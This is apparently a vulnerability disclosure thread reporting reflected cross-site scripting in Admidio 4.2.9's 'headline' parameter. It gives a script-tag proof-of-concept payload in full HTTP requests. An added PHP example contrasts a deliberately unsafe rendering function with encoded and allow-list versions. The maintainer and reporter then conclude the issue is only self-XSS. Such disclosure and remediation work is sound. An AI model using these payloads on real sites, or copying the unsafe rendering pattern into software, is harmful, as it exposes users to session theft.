Cross site scripting in Admidio 4.2.9 via headline parameter in admidio/admidio
Reported on Jun 18th 2023
Description
Cross-site Scripting (XSS) refers to a client-side code injection attack in which an attacker can execute malicious scripts in a legitimate website or web application. XSS occurs when a web application uses unvalidated or unencoded user input within the output it generates.
Proof of Concept
URL: http://localhost/admidio-4.2.9/adm_program/modules/announcements/announcements.php
Vulnerable Parameter: headline
Details:
The URL-encoded GET input headline was set to Announcements"><script>alert(9370)</script>
The input is reflected inside a tag parameter between double quotes.
HTTP Request:
GET /admidio-4.2.9/adm_program/modules/announcements/announcements.php?cat_uuid=0&headline=Announcements"><script>alert(9370)</script> HTTP/1.1
Referer: http://localhost/admidio-4.2.9/
Cookie: ADMIDIO_admidio_adm_SESSION_ID=1vv2p802t9j8fiek592n3p6uqj; ADMIDIO_admidio_adm_cookieconsent_status=dismiss
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
HTTP Response:
Redacted [*]
<p class="lead">The URL in the field <strong>http://localhost/admidio-4.2.9/adm_program/modules/announcements/announcements.php?cat_uuid=0&headline=Announcements"><script>alert(9370)</script></strong> contains invalid characters.<br /><br />Only alphabetic characters, umlauts, numbers 0-9 and special characters .-+_:/#?= are allowed.</p>
How to fix this vulnerability:
Apply context-dependent encoding and/or validation to user input rendered on a page.
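As an added illustration (not Admidio's code, and not part of the report), the following PHP shows the attribute-context reflection described under Details, where the input lands inside a double-quoted tag parameter, beside the two fixes named above. The functions `render_unsafe`, `render_safe` and `headline_is_valid` and the sample input are constructed for this example; the allow-list mirrors the character policy quoted in the HTTP response.

```php
<?php
// Added example, not Admidio's code: the two mitigations named in the report
// ("context-dependent encoding and/or validation") applied to a headline
// value that is rendered inside a double-quoted HTML attribute.

// Constructed sample input, modelled on the payload in the report.
$headline = 'Announcements"><script>alert(9370)</script>';

// Vulnerable pattern (hypothetical, for contrast): the raw request value is
// concatenated straight into an attribute. The first double quote in the
// input terminates the attribute, "> closes the tag, and everything after it
// is parsed by the browser as markup.
function render_unsafe(string $headline): string
{
    return '<input type="text" name="headline" value="' . $headline . '">';
}

// Hardened: encode for the HTML attribute context. ENT_QUOTES escapes both
// " and ' so the value can never terminate the attribute; ENT_SUBSTITUTE
// replaces invalid byte sequences instead of returning an empty string, and
// the explicit charset keeps multi-byte input such as umlauts intact.
function render_safe(string $headline): string
{
    $encoded = htmlspecialchars($headline, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="headline" value="' . $encoded . '">';
}

// Validation: an allow-list mirroring the character policy quoted in the
// report's HTTP response (letters, umlauts, digits 0-9 and .-+_:/#?=).
// \p{L} with the /u modifier matches umlauts and other Unicode letters;
// \A and \z anchor the whole string so no stray characters slip past.
function headline_is_valid(string $headline): bool
{
    return preg_match('/\A[\p{L}0-9.\-+_:\/#?=]+\z/u', $headline) === 1;
}

// Demonstration on the constructed input.
echo "Unsafe rendering:\n", render_unsafe($headline), "\n\n";
echo "Encoded rendering:\n", render_safe($headline), "\n\n";
echo "Allow-list check on payload: ", headline_is_valid($headline) ? "valid" : "rejected", "\n";
echo "Allow-list check on 'Jahresversammlung-2023': ",
    headline_is_valid('Jahresversammlung-2023') ? "valid" : "rejected", "\n";
```

Output encoding is the primary defence here: `render_safe` turns the quote and angle brackets into entities, so the attribute stays closed regardless of what the request carried. The allow-list is a second, independent layer; it rejects the payload outright, but on its own it would be fragile if the permitted set were ever widened, which is why the report recommends encoding and/or validation rather than validation alone.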
Impact
Malicious JavaScript has access to all the same objects as the rest of the web page, including access to cookies and local storage, which are often used to store session tokens. If an attacker can obtain a user's session cookie, they can then impersonate that user.
References
Hi,
I'm not able to reproduce that behavior. If I enter the URL adm_program/modules/announcements/announcements.php?cat_uuid=0&headline=Announcements"><script>alert(9370)</script>
then I get a headline, e.g. Announcements">alert(9370) -
but nothing else. No alert is shown, nor the response that you mentioned.
Hi Mark,
Good day!
Upon checking, it seems that this is only a self-XSS which only works when the response is from Burp Suite; please see the screenshots below:
Screenshot 1:
Screenshot 2:
Screenshot 3:
HTTP Request Used:
GET /admidio-4.2.9/adm_program/modules/announcements/announcements.php?cat_uuid=0">xxxx<script>alert(1)</script>xxxx&headline=Announcements">xxxx<script>alert(9370)</script> HTTP/1.1
Host: localhost
sec-ch-ua:
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: script
Referer: http://localhost/admidio-4.2.9/adm_program/overview.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ADMIDIO_admidio_adm_SESSION_ID=3b0nln1d94pi59vd8rhr30v9sq
Connection: close
I set the complexity to high because for me it's not that easy to get to this XSS only via a link.